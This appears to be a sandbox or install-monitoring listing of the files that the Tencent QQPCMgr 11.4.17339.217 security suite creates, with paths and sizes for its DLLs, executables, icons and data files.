%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.dll (2775 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMConnectTipsConfig.dat (520 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\WebShieldCFG.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AndroidAssistHelper.dll (5950 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_10482.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\StartupMgr\startupmgr.tpc (879 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextUninstall64.dll (1054 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1030.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMClinicCore.dll (9658 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\MalwareLogic.dll (2849 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\RefuseInjectShell.DAT (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftMgr.exe (13399 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCClinicNetRepair\QQPCClinicNetRepair.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1088.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAutoClean.exe (2058 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1084.dat (453 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysMalwareJmp.png (832 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\sm10.dat (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepProv.dat (32 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1001.dat (7 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle71.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_123.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMDLP.rdb (32 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFW.DAT (3752 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\AppMarketPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\qmcloudinter\QMCloudInter.dll (5851 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\HPInternalScan\HPInternalScan.dll (2730 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEmKit.dll (2153 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Redusem.ini (25 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.rdb (23 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_587.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\StartupMgrDll.dll (3862 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\DownloaderMgrUI\DownloaderMgrUI.dll (5199 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCLeakScan.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\TPBrowser.dat (699 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_125.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\zspic.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_190.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SpeedupNetflowLimit.etf (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\8.0.50727.4053.Policy (804 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMNetflowOpti.png (928 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.tpc (665 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.dll (2464 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1025.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\arkGraphic.dll (3882 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCfixUI.dll (2328 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\Common.dll (15137 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMRouterPlugin\QMRouterPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCSoftMgr_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\KingRoot.png (878 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QmTtInterface.dll (1129 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibcss.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCAVSetting.rdb (106 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.dll (7016 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Images\softmgr.ico (289 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAssLibHlp.dll (623 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AppLaunch.1.prf (15 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibcssac.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\libpng.dll (2481 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\jgImage.dll (1436 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMMain.dll (18406 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hptrojanscan\HPTrojanScan.dll (1660 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\exnscan.dll (3783 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NetRepair.exe (5985 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1222.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm03.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftMgr.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\PrefetchConfig.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.rdb (18 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1944.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMVulPlugin\QMVulPlugin.rdb (98 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\IEStartPage.png (433 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLibDown.dat (12 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SXComBase.dll (1423 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\qqpclaunch\QQPCLaunch.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGameAssistant\QMLOLAssistant\QMLOLAssistantCore.dll (2700 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\GF.dll (16015 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\com.qq.qmchext.json (209 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1024.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCUpdateAVLib.exe (1759 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FileOpen.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SmartInstall.dll (2578 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\config\ProblemInfo.xml (199 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMAntiInject.dll (2401 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1022.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\NewPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1087.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibexceptac.xml (27 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMLspPing.exe (1629 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1107.dat (456 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\sm02.dat (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2015.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1025.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCXPNOTIFY.rdb (1719 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCXPNOTIFY.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\adplugin\QMAdFilter(big).png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\unstag.etf (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll (40 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1402.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\tinyxml.dll (963 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1017.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupGiftBagMgr.dll (4049 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr01.def (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\GameBoxPlugin_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCPatch.exe (5447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\notbolock.sys (21 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetConnect\QMNetConnect.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\UninstallTips.exe (2348 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\polyphone.dat (12 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\RtpPage\RtpPage.tpc (674 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMPersonalCenter.rdb (40 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\bugreport_xf.exe (2586 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ScenePackage.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_127.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QQPCClinicNetRepair.png (436 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysmalwarejmp\malware.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_528.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMSysOptimizeAssist\denoiser_info.ini (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperSpeedup.exe (5707 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSFSEngine.DAT (104 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tsmsc.DAT (580 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.tpc (705 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulEngine.dll (7373 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\GF.dll (19043 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSRunner.dll (1312 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\HPScannerPlugin\hpclinicscanplugin\HPClinicScanPlugin.dll (863 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\Install.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUsbGuard.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.rdb (266 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QQPCLeakScan_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMEtw.exe (668 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpload.exe (1850 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr.dll (7038 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\data\speech.dat (91 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMShield64.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupGiftBagMgr\GameSpeedupGiftBagMgr.tpc (956 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_867.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QuickOpenLogo\QMGameSpeedup_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\libjpegturbo.dll (4594 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMRealTimeSpeedupSkinCenter.zip (111 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.dll (7770 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMMobileSettingCenter\QMMobileSettingCenter.tpc (711 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderManager.dll (7753 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask57.png (530 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMStateCheck.exe (1133 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\AdBlockConf.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMWlanMacDll.dll (3096 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1224.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_642.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMKCheck\QMKCheck.dll (1390 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\qqpcuninstalljump.png (256 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\smanalyplugin\SMAnalyPlugin.rdb (1720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\RemoteAssistance.png (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GFCustom.dll (4797 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMExt.dll (95 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftAnalyzePolicy.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\IEStartPage\IEStartPage.rdb (136 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QQPCMgrInstall_20160325034841.Log (18258 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperSpeedup.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_391.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_808.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QQPCMgrUpdate.rdb (1649 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetConnect\QMNetConnectDll.dll (807 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSuperScan.EXE (1382 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qmspeedupplugin\speeduprocket\SpeedupRocket.dll (10131 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMPerfCtrl\QMPerfCtrl.dll (2802 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTask.dat (600 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\TimingTaskParam.xml (413 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1110.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMFeedBack.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\MemDefrag.dll (574 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1111.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1526.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1099.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMVulPlugin\QMVulPlugin.dll (4690 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TxArp6.inf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1020.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSecScanLib.dll (1180 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\QMHealthAssist.png (894 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\GFCustom.dll (3606 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSysRepLibTray.dat (19 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\tsvulinfocrp.db (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOKernelControl.dll (2117 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\Modules.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetflowOpti\NetflowOpti.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\QQPCCommonMgr.rdb (15021 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSysOptimize.exe (8230 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\MalWare.rdb (168 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmsoftplugin\QMSoftPlugin.dll (3253 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1005.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SuperSpeedup.rdb (152 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.tpc (818 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\libjpegturbo.dll (1574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\UpdateTrayIcon.exe (2228 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\TraceClear\QMTraceClear.PNG (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\msvcr80.dll (6481 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\X5Config.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\jgImage.dll (1127 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\MXConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\adfilterlib\tsadlibfloat.xml (294 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysSpeedUp\sysspeedup.tpc (655 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_191.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr00.def (21 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1031.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSSO\I18N\SSOConfig.xml (394 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameUpgrade.dll (6917 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMGCScriptApi.dll (4094 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\GameBoxPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\starttips.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_898.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCSoftTrayTips.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMOfficeScan.dll (181 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMobileFlux\NetMobileFlux.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\ATL80.dll (1915 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\DownloaderMgrScript.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMLogCtrl\QMLogCtrl.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FileUnlock.dll (43 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\blank_gray.ico (82 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\GFCustom.dll (6644 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1019.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\FtSysCommonMgrGF.rdb (68 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1027.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCBTU.exe (1149 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\CheckSysHung.dll (2254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\msvcp80.dll (6658 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.tpc (703 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1997.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.rdb (142 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1701.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SncLib.dat (264 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\sysstartupmgrjmp\SysStartupMgrJmp.dll (415 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_157.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1012.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Common.dll (16258 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\NPEStartup.db (79 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSService.dll (2271 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCClinic.rdb (3795 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.tpc (669 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GarbageClear.dat (134 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1410.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\qqpctray.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\FileSmash\GF.dll (18846 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\GF.dll (18769 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMArpMgr\arkGraphic.dll (5038 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\NetMon.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sCheck_Router.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1086.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.dll (2817 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMContextScan64.dll (1474 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\dlcore.dll (18551 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_533.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameUpConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SysSpeedUpDll.dll (2349 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.tpc (790 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TSVulInc.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\InstAsm.exe (1137 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\CODConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_134.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\DefaultMgr.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\QQMobileMgr.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.rdb (101 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_109.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\SoftMgr\PCSoftMgrToolsDll.dll (1967 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\traceclear.dat (13 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\libpng.dll (2456 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\Both_Disconnected.png (32 bytes)
